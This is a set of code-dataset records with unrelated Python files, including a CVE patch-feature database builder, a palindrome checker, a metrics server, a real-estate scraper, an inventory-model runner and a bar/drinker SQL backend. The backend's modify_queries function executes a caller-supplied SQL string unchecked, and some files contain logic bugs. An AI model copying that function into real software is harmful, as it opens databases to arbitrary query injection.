Exception as e:\n logging.error(str(e))\n return ori_temp_path, fix_temp_path\n\n\ndef generate_code(location, filename, file_base_dir):\n filepath = os.path.join(file_base_dir, filename)\n start_line = int(location[0])\n end_line = int(location[1])\n return open(filepath).readlines()[start_line:end_line]\n\n\ndef main(patch_file, input_repo, CVE_id, library_id, proj_name):\n logging.info(\"generate ori fix files from patch infos\")\n ori_file_path, fix_file_path = generate_ori_fix_files_by_patchinfo(patch_file, input_repo, cve, name)\n if len(ori_file_path) == 0 or len(fix_file_path) == 0:\n return 0\n ori_files = os.listdir(ori_file_path)\n fix_files = os.listdir(fix_file_path)\n if len(ori_files) == 0 or len(fix_files) == 0:\n return 0\n logging.info(\"using hmark to parse ori fix source files\")\n logging.info(\"ori file ....\")\n ori_document_list = generate_cli(ori_file_path)\n logging.info(\"fix file ....\")\n fix_document_list = generate_cli(fix_file_path)\n if len(ori_document_list) == 0 or len(fix_document_list) == 0:\n return 0\n #save result to db\n logging.info(\"VUL FEATURES\")\n for index in range(len(ori_document_list[\"function_hash\"])):\n if ori_document_list[\"function_hash\"][index] not in fix_document_list[\"function_hash\"]:\n vul_document = {}\n vul_document[\"function_hash\"] = ori_document_list[\"function_hash\"][index]\n vul_document[\"function_name\"] = ori_document_list[\"function_name\"][index]\n vul_document[\"function_code\"] = ori_document_list[\"function_code\"][index]\n vul_document[\"CVE_infos\"] = CVE_id\n vul_document[\"proj_name\"] = proj_name\n vul_document[\"library_id\"] = library_id\n if ori_collection.collection.find({\"function_hash\": vul_document[\"function_hash\"],\n \"CVE_infos\": CVE_id}).count() != 0:\n logging.info(\"exist in DB..........................................\")\n else:\n ori_collection.collection.insert_one(vul_document)\n logging.info(\"add to DB*********************************************\")\n\n logging.info(\"PATCH FEATURES\")\n for index in range(len(fix_document_list[\"function_hash\"])):\n if fix_document_list[\"function_hash\"][index] not in ori_document_list[\"function_hash\"]:\n patch_document = {}\n patch_document[\"function_hash\"] = fix_document_list[\"function_hash\"][index]\n 
patch_document[\"function_name\"] = fix_document_list[\"function_name\"][index]\n patch_document[\"function_code\"] = fix_document_list[\"function_code\"][index]\n patch_document[\"CVE_infos\"] = CVE_id\n patch_document[\"proj_name\"] = proj_name\n patch_document[\"library_id\"] = library_id\n if fix_collection.collection.find({\"function_hash\": patch_document[\"function_hash\"],\n \"CVE_infos\": CVE_id}).count() != 0:\n logging.info(\"exist in DB..........................................\")\n else:\n fix_collection.collection.insert_one(patch_document)\n logging.info(\"add to DB*********************************************\")\n\n\nori_collection = mongodb.mongodb_synic(host=config.db_host,\n port=config.db_port,\n db_name=config.db_name,\n collection_name=config.db_vul_collection,\n user=config.db_user,\n password=config.db_password,\n auth=config.db_auth)\nfix_collection = mongodb.mongodb_synic(host=config.db_host,\n port=config.db_port,\n db_name=config.db_name,\n collection_name=config.db_patch_collection,\n user=config.db_user,\n password=config.db_password,\n auth=config.db_auth)\n\n\nif __name__ == '__main__':\n with open('cve_repo_patch.csv') as f:\n csvs = csv.reader(f)\n for i, line in enumerate(csvs):\n if i == 0:\n continue\n if line[-1] and line[-2] and line[-3]:\n library_id = line[1]\n name = line[2]\n cve = line[5]\n path = line[7]\n patch = line[8]\n main(patch, path, cve, library_id, name)\n \n\t \n\ndef old_entry():\n CVE_library_id_dict = {}\n with open(config.CVE_id_library_id, 'r') as csvfile:\n reader = csv.reader(csvfile)\n cnt = 0\n for row in reader:\n cnt += 1\n if cnt > 1 and len(row[8]) > 0:\n CVE_library_id_dict[row[5]] = row[1]\n patch_folder = config.input_patch\n repo_folder = config.input_git_repo\n patch_files = []\n ids = os.listdir(config.input_git_repo)\n patch_files = []\n with open(config.decode_error, 'r') as decode_read:\n reader = csv.reader(decode_read)\n cnt = 0\n for row in reader:\n cnt += 1\n if cnt > 1:\n patchfile = os.path.join(patch_folder, row[0])\n if os.path.exists(patchfile):\n patch_files.append(patchfile)\n logging.info(patch_files)\n\n for file in patch_files:\n library_id = file.split('/')[-2]\n input_repo = os.path.join(repo_folder, library_id)\n proj_name = file.split('/')[-1].split('_CVE')[0]\n CVE_id = file.split('/')[-1].split(proj_name)[-1].split('_')[1]\n if os.path.exists(input_repo) and CVE_id in CVE_library_id_dict.keys() \\\n and CVE_id not in ori_collection.collection.distinct(\"CVE_infos\"):\n logging.info(\"[%d/%d] %s | %s | %s | %s\" % (patch_files.index(file), len(patch_files), CVE_id, library_id, proj_name, file))\n main(file, input_repo, CVE_id, library_id, proj_name)\n else:\n continue\n","sub_path":"generate_DB.py","file_name":"generate_DB.py","file_ext":"py","file_size_in_byte":16053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394390357","text":"\r\ndef isPalindrome(word):\r\n for i in range(0, len(word)):\r\n if word[i] != word[-1-i]:\r\n return False\r\n else:\r\n return True\r\n\r\n\r\nprint('This program will check if your word is a palindrome.\\n')\r\nword = input('Enter a word')\r\n\r\nif isPalindrome(word):\r\n print('Yes it is a palindrome')\r\nelse:\r\n print('No it is not a palindrome')\r\n\r\n\r\n\r\n","sub_path":"misc/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"29839709","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose:\r\n#\r\n# Author: ofitserov\r\n#\r\n# Created: 27.10.2012\r\n# Copyright: (c) ofitserov 2012\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n#!/usr/bin/env python\r\n\r\nimport os\r\nimport hashlib\r\nimport binascii\r\nimport logging\r\n\r\n_log = logging.getLogger(__name__)\r\n\r\nMAX_FILES = 10\r\n\r\nclass Content(object):\r\n def __init__(self, path):\r\n self.path = path\r\n self.files = []\r\n \r\n def hashBytes(self, bytes):\r\n m = hashlib.md5() #@UndefinedVariable\r\n m.update(bytes)\r\n return m.hexdigest()\r\n\r\n def verifyFile(self, hexHash):\r\n try:\r\n with open(os.path.join(self.path, hexHash)) as f:\r\n contents = f.read()\r\n return self.hashBytes(contents) == hexHash\r\n except IOError:\r\n return False\r\n\r\n def getContentId(self):\r\n self.updateFiles()\r\n m = hashlib.md5() #@UndefinedVariable\r\n for f in self.files:\r\n m.update(f)\r\n return m.digest()\r\n\r\n def updateFiles(self):\r\n self.files = []\r\n for fname in os.listdir(self.path):\r\n fpath = os.path.join(self.path, fname)\r\n if not os.path.isfile(fpath):\r\n continue\r\n if not self.verifyFile(fname):\r\n continue\r\n self.files.append(binascii.unhexlify(fname))\r\n\r\n def get(self, binaryHash):\r\n hexHash = binascii.hexlify(binaryHash)\r\n if not self.verifyFile(hexHash):\r\n return None\r\n try:\r\n with open(os.path.join(self.path, hexHash)) as f:\r\n return f.read()\r\n except IOError:\r\n return None\r\n\r\n def put(self, content):\r\n if len(self.files) >= MAX_FILES:\r\n _log.info('File number limit reached')\r\n return False\r\n hexHash = self.hashBytes(content)\r\n try:\r\n with open(os.path.join(self.path, hexHash), 'w') as f:\r\n f.write(content)\r\n self.files.append(binascii.unhexlify(hexHash))\r\n return True\r\n except IOError:\r\n return False\r\n","sub_path":"storage/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"194535413","text":"import asyncio\nfrom collections import namedtuple\nfrom functools import reduce\nfrom enum import Enum, auto\n\n\nMetricEntry = namedtuple('MetricEntry', 'metric_title value timestamp')\n\n\nclass CommandType(Enum):\n put = auto()\n get = auto()\n\n\nclass ClientServerProtocol(asyncio.Protocol):\n event_list: [MetricEntry] = []\n\n def connection_made(self, transport):\n self.transport = transport\n\n def data_received(self, data):\n resp = self.process_data(data.decode())\n self.transport.write(resp.encode())\n\n def process_data(self, command: str) -> str:\n args = command.split()\n if args[0] == CommandType.put.name:\n try:\n metric_title = args[1]\n value = float(args[2])\n timestamp = int(args[3])\n except Exception:\n return self.wrong_command_str\n\n self.event_list.append(MetricEntry(metric_title, value, timestamp))\n return self.ok_command_str\n elif args[0] == CommandType.get.name:\n try:\n metric_title = args[1]\n except Exception:\n return self.wrong_command_str\n\n metric_list = self.get_metric_list(metric_title)\n\n metric_entry_strings = reduce(lambda a, x: a + x + '\\n', map(self.metric_entry_to_string, metric_list), '')\n response = self.wrap_with_ok(metric_entry_strings)\n return response\n else:\n return self.wrong_command_str\n\n def get_metric_list(self, metric_title: str) -> [MetricEntry]:\n if 
metric_title == \"*\":\n return self.event_list\n else:\n filtered = list(filter(lambda x: x.metric_title == metric_title, self.event_list))\n return filtered\n\n @staticmethod\n def wrap_with_ok(string: str) -> str:\n return f'ok\\n{string}\\n'\n\n @staticmethod\n def metric_entry_to_string(metric_entry: MetricEntry) -> str:\n return f\"{metric_entry.metric_title} {metric_entry.value} {metric_entry.timestamp}\"\n \n @property\n def ok_command_str(self):\n return self.wrap_with_ok('')\n\n @property\n def wrong_command_str(self):\n return \"error\\nwrong command\\n\\n\"\n\n\ndef run_server(host, port):\n loop = asyncio.get_event_loop()\n coro = loop.create_server(\n ClientServerProtocol,\n host, port\n )\n\n server = loop.run_until_complete(coro)\n\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n\n\nif __name__ == '__main__':\n run_server(\"127.0.0.1\", 8181)\n","sub_path":"week05,06/week06_01.py","file_name":"week06_01.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64863141","text":"from .core import *\r\nfrom .utils import *\r\nfrom .vparsers import *\r\n\r\n\r\nclass OrnamentBaseParser(SingleWebpageParser):\r\n url = \"https://mieszkania-ornament.pl/index.php\"\r\n method = \"POST\"\r\n headers = {\r\n \"Host\": \"mieszkania-ornament.pl\",\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\",\r\n \"Accept\": \"text/html, */*; q=0.01\",\r\n \"Accept-Language\": \"en-US,en;q=0.5\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Referer\": \"https://mieszkania-ornament.pl/mieszkania\",\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"Connection\": \"keep-alive\"\r\n }\r\n\r\n schema = [\r\n DataUnit(label=\"Budyenk\", parser=DOMTextExtractor(), id=\"building\"),\r\n DataUnit(label=\"Numer\", parser=DOMTextExtractor(), id=\"number\"),\r\n DataUnit(label=\"Piętro\", parser=FloorParser(DOMTextExtractor()), id=\"floor\"),\r\n DataUnit(label=\"Pokoje\", parser=IntParser(DOMTextExtractor()), id=\"rooms\"),\r\n DataUnit(label=\"Pow.\", parser=AreaParser(DOMTextExtractor()), id=\"area\"),\r\n DataUnit(label=\"Dod. 
pow.\", parser=AreaParser(DOMTextExtractor()), id=\"_extra_area\"),\r\n DataUnit(label=\"Cena m^2\", parser=NoneParser(), id=\"none\"),\r\n DataUnit(label=\"Cena\", parser=NoneParser(), id=\"none\"),\r\n DataUnit(label=\"Status\", parser=StatusParser(DOMTextExtractor()), id=\"status\"), \r\n DataUnit(label=\"Rzut\", parser=DOMAttrExtractor(\"value\", preparser=DOMElementExtractor(\"input\", 1)), id=\"plan\"),\r\n DataUnit(label=\"Zapytanie\", parser=NoneParser(), id=\"none\")\r\n ]\r\n\r\n @attributeerror_wrapper(return_value=[])\r\n def find_records(self, soup):\r\n return soup.find_all(\"div\", {\"class\": \"mieszkania-row-body-click\"})\r\n \r\n def split_record(self, record):\r\n return record.find_all(\"div\", recursive=False)\r\n \r\n def modify_record(self, record, soup=None):\r\n record[\"fid\"] = self.create_fid(record)\r\n record[\"plan\"] = self.create_plan_url(record)\r\n self.adjust_areas(record)\r\n return record\r\n \r\n @tryexcept_wrapper((KeyError,), return_value=None)\r\n def create_fid(self, record):\r\n fid_form = \"{building}/{floor}/{number}\"\r\n return fid_form.format(**record)\r\n \r\n def adjust_areas(self, record):\r\n areas = dict(garden=0.0, balcony=0.0)\r\n if record[\"floor\"] == 0:\r\n areas[\"garden\"] = record.get(\"_extra_area\", 0.0)\r\n if record[\"floor\"] > 0:\r\n areas[\"balcony\"] = record.get(\"_extra_area\", 0.0)\r\n record.update(areas)\r\n\r\n @tryexcept_wrapper((KeyError,), return_value=None)\r\n def create_plan_url(self, record):\r\n url_form = \"http://mieszkania-ornament.pl/mieszkania/wyszukaj/{plan}\"\r\n return url_form.format(**record)\r\n\r\n\r\nclass OrnamentParser(OrnamentBaseParser):\r\n data = \"link=mieszkania&link_id=wyszukiwarka_ajax&sortowanie_kolumna=mieszkanie&sortowanie_kierunek=DESC&metraz_min=&metraz_max=&pokoje_min=&pokoje_max=&budynek%5B%5D=B4A&budynek%5B%5D=B4B\"\r\n\r\n\r\nclass OrnamentE3Parser(OrnamentBaseParser):\r\n data = \"link=mieszkania&link_id=wyszukiwarka_ajax&sortowanie_kolumna=mieszkanie&sortowanie_kierunek=DESC&metraz_min=&metraz_max=&pokoje_min=&pokoje_max=&budynek%5B%5D=B3A&budynek%5B%5D=B3B\"\r\n\r\n# l3 ?sortowanie_kolumna=mieszkanie&sortowanie_kierunek=ASC&metraz_min=&metraz_max=&pokoje_min=&pokoje_max=&budynek%5B%5D=B3A&budynek%5B%5D=B3B\r\n# link mieszkania\r\n# link_id wyszukaj","sub_path":"parsers/ornament.py","file_name":"ornament.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542108773","text":"def time_to_deliver(num_packages, delivery_sequence):\n seq = [[int(kk[:kk.index('-')]),int(kk[kk.index('-')+1:])] for kk in delivery_sequence]\n number = 0\n time = 0\n pos1 = 1\n pos2 = 1\n a = seq[0][0]\n for i in range(num_packages):\n if i == num_packages-1:\n if seq[i][0] == a:\n time+=seq[i][1]-pos1+1\n else:\n time+=seq[i][1]-pos2+1\n break\n if seq[i][0]==a:\n period = seq[i][1]-pos1+1\n time+=period\n pos1 = seq[i][1]\n for j in range(i+1,num_packages):\n if seq[j][0] != a:\n break\n pos2 = min(period+pos2,seq[j][1])\n else:\n period = seq[i][1]-pos2+1\n time+=period\n pos2 = seq[i][1]\n for j in range(i+1,num_packages):\n if seq[j][0] == a:\n break \n pos1 = min(period+pos1,seq[j][1])\n return time\n","sub_path":"InterviewOnlineTest/AkunaQuantDev/[Q4]DroneDeliver.py","file_name":"[Q4]DroneDeliver.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304016224","text":"from 
scm_optimization.heuristic_models import LA_DB_Model\nfrom multiprocessing import Pool\nfrom random import random\nfrom scm_optimization.model import *\nfrom scipy.optimize import minimize, bisect, minimize_scalar\nfrom dual_balancing_extension.simulation import Hospital_LA_MDP, Hospital_DB_MDP\nimport pandas as pd\nimport pickle\nimport sys\nimport random\nimport argparse\nimport datetime\n\ntime.time()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run LA Experiment parallel runners.')\n parser.add_argument('--outdir', dest='outdir', help='output dir to write in')\n parser.add_argument('-b', dest='backlogging_cost', type=int, help='backlogging cost')\n parser.add_argument('--info', dest='info', type=int, help='info horizon')\n parser.add_argument('--binom_usage_n', dest='binom_usage_n', type=int, help='binom_usage_n')\n parser.add_argument('--pools', dest='pools', type=int, help='num of parallel runners')\n parser.add_argument('--index', dest='pool_num', type=int, help='index of runner, 0 to pools - 1')\n parser.add_argument('-t', dest='t', type=int, help='starting time step')\n\n args = parser.parse_args()\n\n print(args.backlogging_cost)\n\n outdir = args.outdir if args.outdir else \".\"\n backlogging_cost = args.backlogging_cost if args.backlogging_cost else 1000\n info = args.info if args.info else 0\n binom_usage_n = args.binom_usage_n if args.binom_usage_n else 0\n pools = args.pools if args.pools else 2\n pool_num = args.pool_num if args.pool_num else 0\n t = args.t if args.t else 0\n\n usage_model = BinomUsageModel(n=binom_usage_n, p=1 / binom_usage_n) if binom_usage_n else PoissonUsageModel(scale=1,\n trunk=1e-3)\n\n info_state_rvs = [pacal.ConstDistr(0)] * info + \\\n [pacal.BinomialDistr(10, 0.5)]\n if info == 0:\n info_state_rvs = [pacal.BinomialDistr(10, 0.5), pacal.ConstDistr(0)]\n\n gamma = 1\n lead_time = 0\n holding_cost = 1\n setup_cost = 0\n unit_price = 0\n\n model = LA_DB_Model(gamma,\n lead_time,\n info_state_rvs,\n holding_cost,\n backlogging_cost,\n setup_cost,\n unit_price,\n usage_model=usage_model)\n\n prefix = \"DB_Model_b_{}_info_{}\".format(backlogging_cost, info)\n prefix += \"_binomial_usage_{}\".format(binom_usage_n) if binom_usage_n else \"\"\n fn = outdir + '/' + prefix\n if os.path.isfile(fn):\n model = LA_DB_Model.read_pickle(fn + \"_model.pickle\")\n else:\n model.to_pickle(fn)\n print(\"Writing initial model: \", fn)\n\n for t in range(t, 21):\n segments = list(fn + \"_t_{}_seg_{}_model.pickle\".format(t, pool_num) for pool_num in range(pools))\n loading = True\n while loading:\n print(datetime.datetime.now())\n if all(os.path.isfile(segment) for segment in segments):\n try:\n sub_models = list(LA_DB_Model.read_pickle(segment) for segment in segments)\n loading = False\n print(\"Segments all loaded...\")\n except:\n pass\n else:\n time.sleep(10)\n\n for sub_model in sub_models:\n model.value_function_j.update(sub_model.value_function_j)\n model.value_function_v.update(sub_model.value_function_v)\n model.order_la_cache.update(sub_model.order_la_cache)\n model.reward_funcion_g_cache.update(sub_model.reward_funcion_g_cache)\n model.demand_rv_cache.update(sub_model.demand_rv_cache)\n model.base_stock_la_cache.update(sub_model.base_stock_la_cache)\n\n prefix_t = prefix + \"_t_{}\".format(t)\n print(\"Writing model: \", prefix_t)\n model.to_pickle(outdir + '/' + prefix_t)\n 
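# keep the base checkpoint fresh too, so a restarted run can resume from the newest merged model\n        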
model.to_pickle(fn)\n","sub_path":"batch_multiprocess/run_db_exact_combine.py","file_name":"run_db_exact_combine.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356098002","text":"\"\"\"ntfy_templates\n\nRevision ID: dfa594f9dfba\nRevises: c544a5ebb328\nCreate Date: 2016-06-07 11:14:00.708443\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'dfa594f9dfba'\ndown_revision = 'c544a5ebb328'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('notification_template',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.Unicode(), nullable=False),\n sa.Column('subject', sa.Unicode(), nullable=True),\n sa.Column('body', sa.UnicodeText(), nullable=True),\n sa.Column('is_html', sa.Boolean(), server_default='true', nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('notification_template')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/dfa594f9dfba_ntfy_templates.py","file_name":"dfa594f9dfba_ntfy_templates.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"26214354","text":"from sqlalchemy import create_engine\nfrom sqlalchemy import sql\nimport json\nfrom config import database_uri\n\nengine = create_engine(database_uri)\n\n# drinkers page\ndef get_drinkers(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select * from (select * \\\n\t\t from bills b where b.drinkerID=(select drinkerID \\\n\t\t from drinker where drinkerID= :id) \\\n order by billDate, billTime)as x group by x.barID;')\n rs = con.execute(query, id=drinker_id)\n return [dict(row) for row in rs]\n\ndef get_drinkers_list():\n with engine.connect() as con:\n rs = con.execute('SELECT drinkerID,name,lastname FROM drinker;')\n return [dict(r) for r in rs]\n\ndef get_bills():\n with engine.connect() as con:\n rs = con.execute('SELECT * FROM bills;')\n return [dict(r) for r in rs]\n\ndef get_drinker_orders(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select y.item_name, count(y.item_name) AS Count from (select * \\\n\t from (select t.item_name from transactions t where t.billID IN(select b.billID \\\n\t\t\tfrom bills b where b.drinkerID=(select drinkerID \\\n\t\t\tfrom drinker where drinkerID= :id))) x where x.item_name IN (select * \\\n\t\t\tfrom beers)) y group by y.item_name;')\n rs = con.execute(query, id=drinker_id)\n return [dict(r) for r in rs]\n\n\ndef get_drinker_datespending(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select bars.name, sum(total)total, billTime, billDate \\\n from bills join bars on bars.barID = bills.barID \\\n where drinkerID=(select drinkerID from drinker where drinkerID=:id) \\\n group by bills.barID;')\n rs = con.execute(query, id=drinker_id)\n return [dict(r) for r in rs]\n\n\ndef get_drinker_weekspending(drinker_id):\n with engine.connect() as con:\n query = sql.text(\n 'select br.name as BarName, w.total, count(week(w.billDate)) BillsInWeek, week(billDate) WeekNumberInYear , w.billTime \\\n from bars br, (select z.barID, sum(z.price) as total, z.billDate, z.billTime \\\n from (select s.*, x.billDate, x.billTime \\\n from sells s \\\n INNER JOIN (select 
t.*,b.barID, b.billDate, b.billTime from transactions t, bills b where t.billID IN (select billID from bills b where b.drinkerID=(select drinkerID from drinker where drinkerID=:id)) AND t.billID=b.billID) AS x on s.barID=x.barID AND s.itemID=x.item_name) as z group by barID) as w \\\n            where w.barID=br.barID \\\n            group by WeekNumberInYear \\\n            order by BillsInWeek DESC;')\n        rs = con.execute(query, id=drinker_id)\n        return [dict(r) for r in rs]\n\ndef get_drinker_monthspending(drinker_id):\n    with engine.connect() as con:\n        query = sql.text(\n            'select br.name as BarName, w.total, count(month(w.billDate)) BillsInMonth, month(billDate) MonthNumberInYear , w.billTime \\\n            from bars br, (select z.barID, sum(z.price) as total, z.billDate, z.billTime \\\n            from (select s.*, x.billDate, x.billTime from sells s \\\n            INNER JOIN (select t.*,b.barID, b.billDate, b.billTime from transactions t, bills b where t.billID IN (select billID from bills b where b.drinkerID=(select drinkerID from drinker where drinkerID=:id)) AND t.billID=b.billID) AS x on s.barID=x.barID AND s.itemID=x.item_name) as z group by barID) as w \\\n            where w.barID=br.barID \\\n            group by MonthNumberInYear \\\n            order by BillsInMonth DESC;')\n        rs = con.execute(query, id=drinker_id)\n        return [dict(r) for r in rs]\n\n\n# beer page\ndef get_beers_list():\n    with engine.connect() as con:\n        rs = con.execute('SELECT * FROM beers;')\n        return [dict(r) for r in rs]\n\ndef get_beers_sells(beer_name):\n    with engine.connect() as con:\n        query = sql.text(\n            'select br.name, x.count \\\n            from bars br,(select barID,count(barID)as count \\\n            from bills where billID IN ( select billID from transactions where item_name=:name) \\\n            group by barID \\\n            order by count DESC)x \\\n            where x.barID=br.barID \\\n            LIMIT 12;')\n        rs = con.execute(query, name=beer_name)\n        return [dict(r) for r in rs]\n\ndef get_beers_consumers(beer_name):\n    with engine.connect() as con:\n        query = sql.text(\n            'select dr.name, x.count \\\n            from drinker dr,(select drinkerID,count(drinkerID)as count \\\n            from bills where billID IN ( select billID from transactions where item_name=:name) \\\n            group by drinkerID order by count desc)x \\\n            where x.drinkerID=dr.drinkerID \\\n            LIMIT 10;')\n        rs = con.execute(query, name=beer_name)\n        return [dict(r) for r in rs]\n\ndef get_beers_tsellmost(beer_name):\n    with engine.connect() as con:\n        query = sql.text(\n            'select bars.name, bills.billDate, bills.billTime, count(billDate) as count \\\n            from bills join bars on bars.barID = bills.barID \\\n            where billID IN ( select billID from transactions where item_name=:name) \\\n            group by billDate \\\n            order by count DESC LIMIT 10;')\n        rs = con.execute(query, name=beer_name)\n        return [dict(r) for r in rs]\n\n# bar page\ndef get_bars():\n    with engine.connect() as con:\n        rs = con.execute('SELECT barID,name,openingTime,closingTime FROM bars;')\n        return [dict(r) for r in rs]\n\ndef get_bar_spending(bar_id):\n    with engine.connect() as con:\n        query = sql.text(\n            'select drinker.name, sum(x.total) as Spending \\\n            from (select * from bills where barID=:id) as x \\\n            join drinker on drinker.drinkerID = x.drinkerID \\\n            group by x.drinkerID order by sum(x.total) DESC LIMIT 15;')\n        rs = con.execute(query, id=bar_id)\n        return [dict(r) for r in rs]\n\ndef get_popular_beer(bar_id):\n    with engine.connect() as con:\n        query = sql.text(\n            'select x.item_name as name, count(x.item_name) as count \\\n            from (select item_name from transactions \\\n            where billID IN(select billID from bills where barID=:id)) as x \\\n            where x.item_name IN 
(select name from beers) \\\n group by x.item_name order by count(x.item_name) DESC;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\ndef get_manf_sell(bar_id):\n with engine.connect() as con:\n query = sql.text(\n 'select m.manufacturer, count(m.manufacturer) as count \\\n from(select x.item_name from (select item_name from transactions \\\n where billID IN(select billID from bills where barID=:id)) as x \\\n where x.item_name IN (select name from beers))y, items m \\\n where y.item_name=m.name \\\n group by m.manufacturer \\\n order by count(m.manufacturer) DESC;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\ndef get_busy_day(bar_id):\n with engine.connect() as con:\n query = sql.text(\n ' select billTime,billDate,total,count(billTime)as counts \\\n from bills \\\n where barID=(select barID from bars where barID=:id) \\\n group by hour(billTime) \\\n order by counts DESC;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\ndef get_busy_week(bar_id):\n with engine.connect() as con:\n query = sql.text(\n ' select Y.hour, max(Y.count) AS count, Y.week \\\n from (select bl.barID,hour(bl.billTIme) hour, count(hour(bl.billTime)) count,x.week as week \\\n from bills bl, (select week(billDate) as week from bills group by week order by week ASC)x \\\n where week(bl.billdate)=x.week AND bl.barID=(select barID from bars where barID=:id) \\\n group by hour(bl.billTime), x.week order by x.week, hour(bl.billTime) DESC)Y group by Y.week \\\n LIMIT 10;')\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\n# items\ndef get_item_price(bar_id):\n with engine.connect() as con:\n query = sql.text(\n ' SELECT name, sells.price \\\n FROM items \\\n JOIN sells \\\n ON sells.itemID = items.name && sells.barID=:id;')\n\n rs = con.execute(query, id=bar_id)\n return [dict(r) for r in rs]\n\n#insert transaction\ndef insert_transactions(bigData):\n try:\n with engine.connect() as con:\n y = getExistingBill(bigData)\n if len(y) > 0 : \n update =sql.text(\n 'UPDATE bills \\\n SET tip=:t, total=:to \\\n WHERE billID=:bilID;')\n con.execute(update, t= float(y[0][3]) + float(bigData['tip']),to=float(y[0][4]) + float(bigData['total']),bilID=int(y[0][0]))\n updateTransaction(int(y[0][0]), bigData['item_name'])\n else:\n query = sql.text(\n 'INSERT INTO bills (billTime,billDate,tip,total,drinkerID,barID) \\\n VALUES (:bT,:bD,:ti,:to,:dID,:bID);')\n con.execute(query, bT=bigData['billTime'],bD=bigData['billDate'],ti=bigData['tip'],to=bigData['total'],dID=bigData['drinkerID'],bID=bigData['barID'])\n z = getExistingBill(bigData)\n print('billId', z)\n updateTransaction(int(z[0][0]), bigData['item_name'])\n return [{\"success\": True}]\n\n except Exception as e:\n return [{\"success\": False, \"error\": e}]\n\n#update transaction\ndef updateTransaction(billId, itemName):\n print(billId, itemName)\n with engine.connect() as con:\n itrans = sql.text(\n 'INSERT INTO transactions (billID, item_name) \\\n VALUES (:bID,:i_name);')\n\n con.execute(itrans, bID=billId, i_name=itemName)\n\n#get existing bill row\ndef getExistingBill(bigData):\n with engine.connect() as con:\n check = sql.text(\n 'SELECT billID, billTime, billDate,tip, total, drinkerID, barID \\\n FROM bills \\\n WHERE (drinkerID=:dID && billDate=:bD && billTime=:bT && barID=:bID);')\n rc = con.execute(check, dID=bigData['drinkerID'],bD=bigData['billDate'],bT=bigData['billTime'],bID=bigData['barID'])\n return list(rc)\n\n#queries\ndef modify_queries(queryObj):\n try:\n with 
engine.connect() as con:\n            con.execute(queryObj['query'])\n    except Exception as e:\n        return [{\"success\": False, \"error\": e}]\n    return [{\"success\": True}]\n\n","sub_path":"firstweb/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"426897523","text":"# 892. Surface Area of 3D Shapes\r\nimport numpy\r\n\r\n\r\nclass Solution:\r\n    def surfaceArea(self, grid: list) -> int:\r\n\r\n        N = len(grid)\r\n\r\n        def S(L):\r\n            Sum = 0\r\n            for i in L:\r\n                Last = 0\r\n                for j in i:\r\n                    Sum += abs(j-Last)\r\n                    Last = j\r\n                Sum += Last\r\n            return Sum\r\n        print(S(numpy.array(grid).T)+S(grid)+numpy.sign(grid).sum()*2)\r\n        return S(numpy.array(grid).T)+S(grid)+numpy.sign(grid).sum()*2\r\n\r\n\r\ntest = Solution()\r\ntest.surfaceArea([[1, 2], [3, 4]])\r\n\r\n# Can also be tested by switching Execution to Run with Python Console under Edit Configuration\r\n\r\n# Example 1: input [[1,2],[3,4]], output 34\r\n# Here the 1 means one cube at row 1, column 1, and the 2 means two cubes at row 1, column 2;\r\n# the 3 means three cubes at row 2, column 1, and the 4 means four cubes at row 2, column 2.\r\n# Example 2: input [[1,1,1],[1,0,1],[1,1,1]], output: 32\r\n# a grid of three rows and three columns\r\n\r\n\r\n# Send n walkers over the grid once horizontally and once vertically; every step up or down costs effort. Sum that effort, then add 2 * (the count of entries > 0) in the array to get the answer\r\n# Each walker starts on flat ground and ends on flat ground.\r\n# While walking the steps, just record the absolute difference between the previous step height and the current one; that is the effort.\r\n# Walking once horizontally and once vertically simply means calling the function again with the numpy 